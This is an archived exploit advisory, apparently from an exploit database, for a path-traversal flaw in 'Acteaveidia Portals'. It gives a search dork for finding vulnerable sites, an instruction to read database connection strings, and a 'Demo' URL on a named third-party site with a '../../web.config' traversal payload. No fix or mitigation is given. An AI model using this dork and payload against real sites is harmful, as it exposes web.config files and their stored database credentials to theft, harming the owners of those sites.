id: 14322
date: 10/04/2010
title: Acteaveidia Portals Read web.config Vulnerability
author: Ashiyane
cves: 

=================================================
Acteaveidia Portals Read web.config Vulnerability 
=================================================

###################################################################
#
# Exploit Title : Acteaveidia Portals Read web.config Vulnerability 
# Author        : ashiyane digital security team
# Contact       : drosera_p[at]yahoo , drosera.p[at]gmail
# Discovered by : Drosera^Cqq47
# Security Risk::High
###################################################################
#  Dork: "powered by active idea"
#  Read web.config on webfolder   
#  Use ConnectionStrings in page source
#  Demo:http://www.caspian.aero/html/en/page.aspx?name=../../web.config
#
####################################################################
# Date : september, 21 , 2010
# Special Thanks To Maste®
####################################################################



#  0day.today [2023-03-23]  #